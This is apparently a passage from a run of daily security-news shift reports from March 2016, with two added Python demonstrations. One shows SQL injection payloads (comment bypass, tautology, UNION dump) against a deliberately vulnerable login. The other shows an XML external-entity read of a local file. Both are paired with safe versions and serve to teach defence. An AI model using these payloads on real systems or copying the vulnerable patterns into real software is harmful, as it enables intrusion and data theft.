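    """Constructed sample data: an in-memory users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement from user input, so the input can change the
    statement's structure. Returns the (username, role) rows that matched."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the input is only ever data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Three payload shapes from the usual cheat-sheet families. The space after
# "--" matters on MySQL, where the comment marker must be followed by whitespace.
COMMENT_BYPASS = "alice' -- "      # closes the string, comments out the password check
TAUTOLOGY = "' OR '1'='1"          # makes the WHERE clause true for every row
UNION_DUMP = "x' UNION SELECT username, password FROM users -- "  # same column count


def run_payloads(conn):
    """Run each payload through both implementations; returns a dict of results."""
    return {
        "comment_vuln": login_vulnerable(conn, COMMENT_BYPASS, "wrong"),
        "comment_safe": login_parameterized(conn, COMMENT_BYPASS, "wrong"),
        "tautology_vuln": login_vulnerable(conn, "nobody", TAUTOLOGY),
        "tautology_safe": login_parameterized(conn, "nobody", TAUTOLOGY),
        "union_vuln": login_vulnerable(conn, UNION_DUMP, ""),
        "union_safe": login_parameterized(conn, UNION_DUMP, ""),
        "legit_safe": login_parameterized(conn, "alice", "correct horse"),
    }


if __name__ == "__main__":
    for name, rows in run_payloads(make_db()).items():
        print("%-15s %s" % (name, rows))
```

The UNION payload is the one to study: it only works because the injected SELECT returns the same number of columns as the original, which is why column-count probing (ORDER BY n, UNION SELECT NULL,NULL,...) takes up so much of any cheat sheet. Against the parameterised query the same string is compared literally with the username column and matches nothing.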
*** Ransomware: "Petya" hits the German-speaking region ***
---------------------------------------------
The ransomware spreads via Dropbox and forces Windows users to pay money to unlock their computer.
---------------------------------------------
http://derstandard.at/2000033657066
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 23-03-2016 18:00 − Thursday 24-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Cisco IOS and IOS XE and Cisco Unified Communications Manager Software Session Initiation Protocol Memory Leak Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** IBM Security Bulletin: IBM Forms Server vulnerability identified in Webform Server (CVE-2016-0223) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21977574
*** Security Bulletin: Vulnerabilities in OpenSSL affect IBM Flex System FC5022 16Gb SAN and EN4023 10Gb Scalable Switches ***
---------------------------------------------
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099273
*** Security Bulletin: Vulnerabilities in OpenSSL affect QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module for BladeCenter ***
---------------------------------------------
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099272
*** Cisco Network Convergence System 6000 Series Routers SCP and SFTP Modules Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Zyxel MAX3XX Series Wimax CPEs Hardcoded Root Password ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030135
*** Measuring SMTP STARTTLS Deployment Quality ***
---------------------------------------------
At Yahoo, our users send and receive billions of emails everyday. We work to make Yahoo Mail easy to use, personalized, and secure for our hundreds of millions of users around the world. In line with our efforts to protect our users ..
---------------------------------------------
https://yahoo-security.tumblr.com/post/141495385400/measuring-smtp-starttls…
*** Kerberos Kadmind Null Pointer Dereference in process_db_args() Lets Remote Authenticated Users Execute Arbitrary Code on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1035399
*** CA Single Sign-On Agent Input Validation Flaws Let Remote Users Obtain Potentially Sensitive Information and Cause Denial of Service Conditions ***
---------------------------------------------
http://www.securitytracker.com/id/1035389
*** Researchers find hole in SIP, Apple's newest protection feature ***
---------------------------------------------
System Integrity Protection pwned. Security researchers have discovered a vulnerability that creates a means for hackers to circumvent Apple's newest protection ..
---------------------------------------------
www.theregister.co.uk/2016/03/24/macosx_security_bypass/
*** Nemucods CRYPTED Ransomware Can Be Neutralized with This Decrypter ***
---------------------------------------------
Victims that had their computers locked by a ransomware that uses the CRYPTED file extension can now free their files using a special decrypter created by Emsisoft security ..
---------------------------------------------
http://news.softpedia.com/news/nemucod-s-crypted-ransomware-can-be-neutrali…
*** RCE flaw affects DVRs sold by over 70 different vendors ***
---------------------------------------------
RSA security researcher Rotem Kerner has discovered a remote code execution vulnerability that affects digital video recorders (DVRs) sold by more than 70 different vendors around the world.
---------------------------------------------
https://www.helpnetsecurity.com/2016/03/24/rce-flaw-dvrs-70-vendors/
*** Petya ransomware locks down the entire computer ***
---------------------------------------------
A new ransomware is currently targeting German-speaking Windows users. Petya is distributed via Dropbox and manipulates the hard drive so that the operating system can no longer run.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-d…
*** VU#279472: Granite Data Services AMF framework fails to properly parse XML input containing a reference to external entities ***
---------------------------------------------
http://www.kb.cert.org/vuls/id/279472
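The iBooks Author note further up (CVE-2016-1789) and this VU#279472 entry describe the same flaw class: an XML parser that resolves external entities declared in the DTD, so a crafted document can pull a local file into its own content. The block below is an added example built on Python's standard xml.sax parser, not code from Apple, Granite Data Services or CERT/CC. It writes a constructed "secret" file to a temporary location, builds the classic payload pointing at it, and parses it once with external general entities enabled (the vulnerable setting) and once disabled (the Python default since 3.7.1).

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Accumulates every run of character data the parser reports, including
    text spliced in from an entity the parser decided to expand."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def parse_untrusted_xml(xml_bytes, resolve_external_entities):
    """Parse XML from an untrusted source and return its text content.

    resolve_external_entities=True is the vulnerable setting: SYSTEM
    identifiers in the DTD are fetched (local files as well as URLs) and
    their content becomes part of the document. False is the hardened
    setting: the entity reference is skipped.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def build_xxe_sample():
    """Constructed sample: a file standing in for a secret on the server, and
    a document whose DTD declares an external entity pointing at it.
    Returns (secret_path, xml_bytes); the caller removes the file."""
    fd, secret_path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write("api-token=s3cr3t-value")
    xml = ('<?xml version="1.0"?>\n'
           '<!DOCTYPE doc [\n'
           '  <!ENTITY xxe SYSTEM "' + secret_path + '">\n'
           ']>\n'
           '<doc><title>&xxe;</title></doc>\n').encode()
    return secret_path, xml


def demo():
    """Parse the sample both ways; returns (text_vulnerable, text_hardened)
    and removes the temporary file afterwards."""
    secret_path, xml = build_xxe_sample()
    try:
        return (parse_untrusted_xml(xml, resolve_external_entities=True),
                parse_untrusted_xml(xml, resolve_external_entities=False))
    finally:
        os.remove(secret_path)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("entities resolved:", repr(vulnerable))
    print("entities skipped: ", repr(hardened))
```

With the feature enabled the title element's text is the content of the file; with it disabled the reference is dropped and the text is empty. Any parser that accepts documents from outside the trust boundary (an uploaded file, an AMF or SOAP request body) needs the equivalent of the second setting, and ideally DTD processing switched off entirely.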
*** RedDoor: extortionists threaten German websites with DDoS attacks ***
---------------------------------------------
Pay us 3 bitcoin or we take your website down: with this threat a group is currently extorting companies in Germany, Austria and Switzerland. Allegedly, however, it is a bluff.
---------------------------------------------
http://heise.de/-3151565
*** Emergency Java Patch Re-Issued for 2013 Vulnerability ***
---------------------------------------------
Oracle yesterday released an emergency patch for a Java vulnerability that was improperly patched in 2013.
---------------------------------------------
http://threatpost.com/emergency-java-patch-re-issued-for-2013-vulnerability…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 22-03-2016 18:00 − Wednesday 23-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** What was all that about a scary iMessage flaw? Your three-minute guide ***
---------------------------------------------
On Sunday, we were warned that hackers could read our iMessage texts, photos and videos. Should I be worried? As it turns out: no. If you're even a little curious about cryptography and secure programming, though, it should interest and amuse you.
---------------------------------------------
http://www.theregister.co.uk/2016/03/23/imessages_flaw_details/
*** Google publishes list of Certificate Authorities it doesnt trust ***
---------------------------------------------
Thawte experiment aims to expose issuers of dodgy creds. Google's announced another expansion to the security information offered in its transparency projects: it's now going to track certificates you might not want to trust.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/03/23/google_now_…
*** Abusing Oracles, (Wed, Mar 23rd) ***
---------------------------------------------
No, no this has nothing to do with Oracle Corporation! This diary is about abusing encryption and decryption Oracles. First a bit of a background story. Most of the days I do web and mobile application penetration testing. While technical vulnerabilities, such as SQL Injection, XSS and similar are still commonly found, in last couple of years I would maybe dare to say that the Direct Object Reference (DOR) vulnerabilities have become prevalent.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20875&rss
*** Libmcrypt - Incorrect S-Boxes for GOST cipher (2008, unfixed) ***
---------------------------------------------
PHP just decided to abandon the trash fire that is libmcrypt. There were (are?) still other projects that use(d) it, so I'm sharing this link in the interest of strongly encouraging projects to drop it like a lead balloon. This is far from the only problem with it ...
---------------------------------------------
https://www.reddit.com/r/netsec/comments/4bl8xu/libmcrypt_incorrect_sboxes_…
*** Microsoft Adds New Feature in Office 2016 That Can Block Macro Malware ***
---------------------------------------------
Microsoft is finally addressing the elephant in the room in terms of security for Office users and has announced a new feature in the Office 2016 suite that will make it harder for attackers to exploit macro malware. ... Sysadmins can now block macros that connect to the Internet ... "This feature can be controlled via Group Policy and configured per application," Microsoft explains. "It enables enterprise administrators to block macros from running in Word, Excel and PowerPoint
---------------------------------------------
http://news.softpedia.com/news/microsoft-adds-new-feature-in-office-2016-th…
*** GroupWise 2014 R2 Hot Patch 1 - Windows Full Multilingual ***
---------------------------------------------
Abstract: GroupWise 2014 R2 Hot Patch 1 has been released. Be aware that there are security fixes in this release. Please see the Security section for details.
---------------------------------------------
https://download.novell.com/Download?buildid=AA7ZB93KAjc~
*** GroupWise 2014 R2 Hot Patch 1 - Windows Client Multilingual ***
---------------------------------------------
Abstract: GroupWise 2014 R2 Hot Patch 1 has been released. Be aware that there are security fixes in this release. Please see the Security section for details.
---------------------------------------------
https://download.novell.com/Download?buildid=dxd3rzvGvig~
*** GroupWise 2014 R2 Hot Patch 1 - Linux Full Multilingual ***
---------------------------------------------
Abstract: GroupWise 2014 R2 Hot Patch 1 has been released. Be aware that there are security fixes in this release. Please see the Security section for details.
---------------------------------------------
https://download.novell.com/Download?buildid=Wxix0_fCdmI~
*** sol51518670: Linux kernel vulnerability CVE-2015-2922 ***
---------------------------------------------
The ndisc_router_discovery function in net/ipv6/ndisc.c in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in the Linux kernel before 3.19.6 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message. (CVE-2015-2922)
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/51/sol51518670.html
*** F5 Security Advisory: Apache Tomcat 6.x vulnerabilities CVE-2015-5174, CVE-2015-5345, CVE-2016-0706, and CVE-2016-0714 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/30/sol30971148.html?…
---------------------------------------------
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco IOS and NX-OS Software Locator/ID Separation Protocol Packet Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS and IOS XE Software Smart Install Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS Software Wide Area Application Services Express Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS and IOS XE Software Internet Key Exchange Version 2 Fragmentation Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS and IOS XE Software DHCPv6 Relay Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** ZDI-16-210: IBM Informix portmap Service Privilege Escalation Vulnerability ***
---------------------------------------------
This vulnerability allows local users to execute arbitrary code on vulnerable installations of IBM Informix. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
www.zerodayinitiative.com/advisories/ZDI-16-210/
*** ZDI-16-209: IBM Informix nsrexecd Service Privilege Escalation Vulnerability ***
---------------------------------------------
This vulnerability allows local users to execute arbitrary code on vulnerable installations of IBM Informix. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-209/
*** ZDI-16-208: IBM Informix nsrd Service Privilege Escalation Vulnerability ***
---------------------------------------------
This vulnerability allows local users to execute arbitrary code on vulnerable installations of IBM Informix. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-208/
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 21-03-2016 18:00 − Tuesday 22-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Moodle Bugs Let Remote Authenticated Users Obtain Potentially Sensitive Information and Bypass Security Restrictions and Remote Users Conduct Cross-Site Scripting and Cross-Site Request Forgery Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1035333
*** Libxml2 Memory Allocation Error in xmlStringGetNodeList() Lets Remote Users Consume Excessive Memory Resources ***
---------------------------------------------
http://www.securitytracker.com/id/1035335
*** D-Link DWR-932 Authentication Bypass / Password Disclosure ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030115
*** AsusTEK asio.sys MSR Manipulation ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030116
*** Google slings critical patch at exploited Linux kernel root hole ***
---------------------------------------------
Android re-installation ahoy to sink privilege elevation that opens avenue for rooting apps
Google has shipped an out-of-band patch for Android shuttering a bug that is under active exploitation to root devices.
---------------------------------------------
www.theregister.co.uk/2016/03/22/google_slings_critcial_patch_at_exploited_…
*** IBM Security Bulletin: Multiple Vulnerabilities in Oracle Outside In Technology affects IBM Rational DOORS Next Generation ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21978747
*** IBM Security Bulletin: Lotus Quickr 8.5 for WebSphere Portal January 2016 CPU (CVE-2016-0448) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21977579
*** Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM BladeCenter Advanced Management Module (AMM) (CVE-2015-7575) ***
---------------------------------------------
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099195
*** IBM Security Bulletin: Vulnerability in Apache Cordova affects IBM MobileFirst Platform Foundation (CVE-2015-5256) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg2C1000109
*** Security Bulletin: Vulnerability in OpenSSH affects IBM Flex System FC3171 8Gb SAN Switch and SAN Pass-thru, QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module and QLogic Virtual Fabric Extension Module for IBM BladeCenter (CVE-2015-5600) ***
---------------------------------------------
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098977
*** Samba developers warn of a flaw that is also in Windows ***
---------------------------------------------
Badlock is the name of a critical security vulnerability that Samba developers have discovered in their own software, but also in Windows. They urge operators of such servers to set aside time on 12 April for applying patches.
---------------------------------------------
http://heise.de/-3148379
*** Deluge of Apple Patches Fix iMessage Crypto Bug, Much More ***
---------------------------------------------
Apple deployed patches for nearly all of its products, including Safari, OS X, iOS, Apple TV's tvOS, and watchOS on Monday.
---------------------------------------------
http://threatpost.com/deluge-of-apple-patches-fix-imessage-crypto-bug-much-…
*** "E-ISAC and SANS Report On The Ukrainian Grid Attack" ***
---------------------------------------------
Yesterday the SANS ICS team released its Defense Use Case (DUC) #5 analyzing the cyber-attack that impacted Ukraine on December 23, 2015. The paper is written from the perspective of what lessons can be learned from the event. The ..
---------------------------------------------
http://ics.sans.org/blog/2016/03/22/e-isac-and-sans-report-on-the-ukrainian…
*** A look at Locky ransomware ***
---------------------------------------------
The Locky ransomware was first spotted in the wild last month, in February 2016. Locky came to the limelight when it hit the Hollywood Hospital last month, causing the hospital to pay bitcoins worth USD 17,000 in ransom. Locky is known to ..
---------------------------------------------
http://research.zscaler.com/2016/03/a-look-at-locky-ransomware.html
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 18-03-2016 18:00 − Monday 21-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Palo Alto Networks: VPN web interface attackable with overlong usernames ***
---------------------------------------------
A security researcher at the Heidelberg company ERNW has found a remote code execution flaw in a Palo Alto appliance. The cause was a missing length check on the username input.
---------------------------------------------
http://www.golem.de/news/palo-alto-networks-vpn-webinterface-mit-ueberlange…
*** IBM Security Bulletin: Cross-site scripting vulnerability in IBM WebSphere Application Server (CVE-2016-0283) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21978293
*** FreeBSD crushes system-crashing bug ***
---------------------------------------------
Time to upgrade, Unix-like OS-havers
Sysadmins ought to patch their FreeBSD systems after an irritating bug was found in the kernel ..
---------------------------------------------
www.theregister.co.uk/2016/03/18/freebsd_bug_patched/
*** Unscheduled Android patch, and Stagefright once again ***
---------------------------------------------
Just under three weeks after the scheduled March update, Google is closing a security hole in Android that lets attackers obtain root privileges. Meanwhile, another Stagefright exploit has become known.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Unplanmaessiger-Android-Patch-und-no…
*** Google offers binary comparison tool BinDiff for free ***
---------------------------------------------
In case you missed it, Google announced on Friday that BinDiff, a comparison tool for binary files, can now be downloaded for free. The tool is used to spot differences and similarities in disassembled code, and is helpful for identifying and isolating fixes for vulnerabilities in vendor-supplied ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/03/21/binary-comparison-tool-bindiff-f…
*** Exploiting a Leaked Thread Handle ***
---------------------------------------------
Once in awhile you'll find a bug that allows you to leak a handle opened in a privileged process into a lower privileged process. I found just such a bug in the Secondary Logon service on Windows, which was fixed this month as ..
---------------------------------------------
http://googleprojectzero.blogspot.co.at/2016/03/exploiting-leaked-thread-ha…
*** Extortionists upgrade: TeslaCrypt 4.0 encryption trojan sighted ***
---------------------------------------------
Security researchers warn of a new version of the TeslaCrypt ransomware, which infects computers and encrypts data. It is now even harder for victims to find out what has happened to their files.
---------------------------------------------
http://heise.de/-3145559
*** NIST releases updated telework guidance ***
---------------------------------------------
The National Institute of Standards and Technology (NIST) released draft guidance for telework protocol, an update to the federal agency's initial documents drafted in 2009.
---------------------------------------------
http://www.scmagazine.com/nist-releases-updated-telework-guidance/article/4…
*** iOS URI Schemes Abuse ***
---------------------------------------------
A set of URI schemes bugs that lead Safari to crash/freeze.
---------------------------------------------
https://github.com/pwnsdx/iOS-URI-Schemes-Abuse-PoC
*** OS X Malware Samples Analyzed ***
---------------------------------------------
A couple of months ago, as we rang in 2016, we thought it would be interesting to take a quick look back at some OSX malware from 2015 and 2014. As reported by the team at Bit9+Carbon Black [1], 2015 marked 'the most prolific year in history for OS X ..
---------------------------------------------
https://www.alienvault.com/open-threat-exchange/blog/os-x-malware-samples-a…
*** Office for Mac: Microsoft releases security updates ***
---------------------------------------------
Microsoft has released updates for the OS X versions of Office 2011 and Office 2016 that are meant to close a critical vulnerability. The new version of the Office suite extends its language support.
---------------------------------------------
http://heise.de/-3146389
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 17-03-2016 18:00 − Friday 18-03-2016 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
*** Online Banking Threats in 2015: The Curious Case of DRIDEX's Prevalence ***
---------------------------------------------
The thing about takedowns is that they do not necessarily wipe out the cybercriminal operations. In 2014, the ZeroAccess takedown affected the botnet's click fraud operation, but its infections continued to soar. DRIDEX's ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/curious-case-dri…
*** Mitre Takes On Critics, Set To Revamp CVE Vulnerability Reporting ***
---------------------------------------------
Mitre Corporation will introduce a pilot program for classifying CVEs in response to critics who contend the agency is failing to keep pace with a massive influx of CVE number requests.
---------------------------------------------
http://threatpost.com/mitre-takes-on-critics-set-to-revamp-cve-vulnerabilit…
*** Server Security: Indicators of Compromised Behavior with OSSEC ***
---------------------------------------------
We leverage OSSEC extensively here at Sucuri to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source host-based intrusion detection system (HIDS); it has a powerful correlation and analysis engine that integrates log analysis, file integrity monitoring, rootkit detection, ..
---------------------------------------------
https://blog.sucuri.net/2016/03/server-security-anomaly-behaviour-with-osse…
*** No mas, Samas: What's in this ransomware's modus operandi? ***
---------------------------------------------
We've seen how ransomware managed to become a threat category that sends consumers and enterprise reeling when it hits them. It has become a high-commodity malware that is used as payload to spam email, macro malware, and exploit kit campaigns. It also digs onto victims' pockets in exchange for ..
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/03/17/no-mas-samas-whats-in-t…
*** ABB Panel Builder 800 DLL Hijacking Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a DLL Hijacking vulnerability in the ABB Panel Builder 800 Version 5.1 application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-077-01
*** Apache ActiveMQ Input Validation Flaw Lets Remote Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1035328
*** Apache ActiveMQ Lets Remote Users Conduct Clickjacking Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1035327
*** Android adware infiltrates devices' firmware, Trend Micro apps ***
---------------------------------------------
Dubbed Gmobi by Dr. Web researchers, the malware comes in the form of a software development kit (SDK), and has been found in several legitimate applications by well-known companies, as well as in firmware for nearly 40 mobile ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/03/18/android-adware-infiltrates-devic…
*** SSA-151221 (Last Update 2016-03-18): Incorrect File Permissions in APOGEE Insight ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-151221…
*** [HTB23293]: Remote Code Execution via CSRF in iTop ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via a Cross-Site Request Forgery flaw that is also present ..
---------------------------------------------
https://www.htbridge.com/advisory/HTB23293
*** Let's Encrypt joins the CA/Browser Forum ***
---------------------------------------------
The next step toward becoming a recognized certificate authority has been taken: as a member of the CA/Browser Forum, Let's Encrypt is now on an equal footing with Comodo, Symantec & Co.
---------------------------------------------
http://heise.de/-3144202
*** DDR4 memory also vulnerable to bit flips ***
---------------------------------------------
Apparently more types of RAM are vulnerable to the Rowhammer attack than previously thought. Researchers have now presented an attack on DDR4 memory; professional server memory is said to be affected as well.
---------------------------------------------
http://www.golem.de/news/rowhammer-auch-ddr4-speicher-fuer-bitflips-anfaell…
*** Security updates for Symantec Endpoint Protection ***
---------------------------------------------
The current update for Symantec Endpoint Protection (SEP) closes three holes, including an SQL injection.
---------------------------------------------
http://heise.de/-3144528
*** Biometrics not a magic infosec bullet for web banking, warns GCHQ bloke ***
---------------------------------------------
You can change a password. You can't change fingerprints
Around the world, banks are implementing biometric authentication systems for their customers as fraud cases increase - but experts warn biometrics should not be treated like a silver bullet for ID ..
---------------------------------------------
www.theregister.co.uk/2016/03/18/biometrics_not_answer_online_banking_secur…
*** Security: New Stagefright exploit affects millions of Android devices ***
---------------------------------------------
Stagefright still threatens many unpatched Android devices worldwide, but is considered difficult to exploit. A new technique requires some infrastructure but is likely to have greater practical relevance.
---------------------------------------------
http://www.golem.de/news/security-neuer-stagefright-exploit-betrifft-millio…
*** DDoS attacks on Swiss websites ***
---------------------------------------------
In Switzerland last week there was a series of DDoS attacks on online shops, the Swiss Federal Railways and financial institutions. In one case ..
---------------------------------------------
http://heise.de/-3144854
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 16-03-2016 18:00 − Thursday 17-03-2016 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Blundering ransomware uses backdoored crypto, unlock keys spewed ***
---------------------------------------------
Hahah ... wait, what? A software developer whose example encryption code was used by a strain of ransomware has released the decryption keys for the malware.
---------------------------------------------
http://www.theregister.co.uk/2016/03/16/locky_ransomware_undone_for_now/
*** Netgear CG3000v2 Password Change Bypass ***
---------------------------------------------
I noticed a security issue in my Netgear CG3000v2 cable modem, as provided by Optus (an Australian phone/communications provider).
The "admin password" can be changed on the web interface, without providing the current password. The page http://192.168.0.1/SetPassword.asp prompts for old and new passwords (and repeat of new), but in fact ignores the old password provided, and changes the password to the new one, regardless.
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016030089
*** 2015-12-10: POODLE Vulnerability in RTU500 Series ***
---------------------------------------------
Affected Products: RTU500 series firmware of release 10 less than version 10.8.6 and of release 11 less than 11.2.1. RTU500 series releases 9 and less are not affected.
Summary: A vulnerability has recently been published that affects the SSL protocol 3.0 and is commonly referred to as "POODLE". The vulnerability affects the product versions listed above.
---------------------------------------------
http://search.abb.com/library/Download.aspx?DocumentID=1KGT090264&LanguageC…
*** ADAC: Cars with keyless entry are much easier to steal ***
---------------------------------------------
Thieves can exploit a security flaw in the radio link
---------------------------------------------
http://derstandard.at/2000033077997
*** APT Attackers Flying More False Flags Than Ever ***
---------------------------------------------
Investigators continue to focus on attack attribution, but Kaspersky researchers speaking at CanSecWest 2016 caution that attackers are manipulating data used to tie attacks to perpetrators.
---------------------------------------------
http://threatpost.com/apt-attackers-flying-more-false-flags-than-ever/11681…
*** sol06223540: F5 TCP vulnerability CVE-2015-8240 ***
---------------------------------------------
Improper handling of TCP options under some circumstances may cause a denial-of-service (DoS) condition. (CVE-2015-8240) Versions known to be vulnerable: 11.6.0 HF5, 11.5.3 HF2, 11.4.1 HF9 on various BIG-IP products
---------------------------------------------
https://support.f5.com/kb/en-us/solutions/public/k/06/sol06223540.html
*** Metaphor - A (real) reallife Stagefright exploit ***
---------------------------------------------
The team here at NorthBit has built a working exploit affecting Android versions 2.2 - 4.0 and 5.0 - 5.1, while bypassing ASLR on versions 5.0 - 5.1 (as Android versions 2.2 - 4.0 do not implement ASLR).
---------------------------------------------
https://www.exploit-db.com/docs/39527.pdf
*** Xen XSA-171: I/O port access privilege escalation in x86-64 Linux ***
---------------------------------------------
User mode processes not supposed to be able to access I/O ports may be granted such permission, potentially resulting in one or more of in-guest privilege escalation, guest crashes (Denial of Service), or in-guest information leaks.
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-171.html
*** BSI publishes requirements catalogue for cloud computing ***
---------------------------------------------
Using the catalogue, customers of cloud service providers can find out how information security stands in a cloud. Providers of such services can also use it, for example, to prepare for an upcoming certification.
---------------------------------------------
http://heise.de/-3141368
*** Introducing SHIPS - Centralized Password Management ***
---------------------------------------------
The Shared Host Integrated Password System (SHIPS) is an open-source solution created by Geoff Walton from TrustedSec to provide unique and rotated local super user or administrator passwords for environments where it is not possible or not appropriate to disable these local accounts. Our goal is to make post exploitation more difficult and provide a simplistic way to manage multiple systems in an environment where Windows does not necessarily support an alternative. SHIPS supports both Linux
---------------------------------------------
https://www.trustedsec.com/january-2015/introducing-ships-centralized-local…
*** New NIST Encryption Guidelines ***
---------------------------------------------
NIST has published a draft of their new standard for encryption use: "NIST Special Publication 800-175B, Guideline for Using Cryptographic Standards in the Federal Government: Cryptographic Mechanisms." In it, the Escrowed Encryption Standard from the 1990s, FIPS-185, is no longer certified. And Skipjack, the NSA's symmetric algorithm from the same period, will no longer be certified.
---------------------------------------------
https://www.schneier.com/blog/archives/2016/03/new_nist_encryp.html
*** Scores of Serial Servers Plagued by Lack of Authentication, Encryption ***
---------------------------------------------
Thousands of serial servers connected to the internet aren't password protected and lack encryption, leaving any data that transfers between them and the devices they're connected to open to snooping, experts warn.
---------------------------------------------
http://threatpost.com/scores-of-serial-servers-plagued-by-lack-of-authentic…
*** VU#897144: Solarwinds Dameware Remote Mini Controller Windows service is vulnerable to stack buffer overflow ***
---------------------------------------------
The Solarwinds Dameware Remote Mini Controller Windows service is vulnerable to a stack buffer overflow (CWE-121: Stack-based Buffer Overflow, CVE-2016-2345). Solarwinds Dameware Remote Mini Controller is software for assisting with remote desktop connections for helpdesk support.
---------------------------------------------
http://www.kb.cert.org/vuls/id/897144
*** Bypassing NoScript Security Suite Using Cross-Site Scripting and MITM Attacks ***
---------------------------------------------
This paper discusses different techniques that an attacker can use to bypass NoScript Security Suite protection. These techniques can be used by malicious actors to bypass the default installation of NoScript. The paper also provides solutions and recommendations for end-users that can enhance the current protection of NoScript Security Suite.
---------------------------------------------
https://mazinahmed.net/uploads/Bypassing%20NoScript%20Security%20Suite%20Us…
*** Symantec Endpoint Protection Multiple Security Issues ***
---------------------------------------------
Symantec Endpoint Protection (SEP) was susceptible to a number of security findings that could potentially result in an authorized but less privileged user gaining elevated access to the Management Console. SEP Client security mitigations can potentially be bypassed allowing arbitrary code execution on a targeted client.
---------------------------------------------
